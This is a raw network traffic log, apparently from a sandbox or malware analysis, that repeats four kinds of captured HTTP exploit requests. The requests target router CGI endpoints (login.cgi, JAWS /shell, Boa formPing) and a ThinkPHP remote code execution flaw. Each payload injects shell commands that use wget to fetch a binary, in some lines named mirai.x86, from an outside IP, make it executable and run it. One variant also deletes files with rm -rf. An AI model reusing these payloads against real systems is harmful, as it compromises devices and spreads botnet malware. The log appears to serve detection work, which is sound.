Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
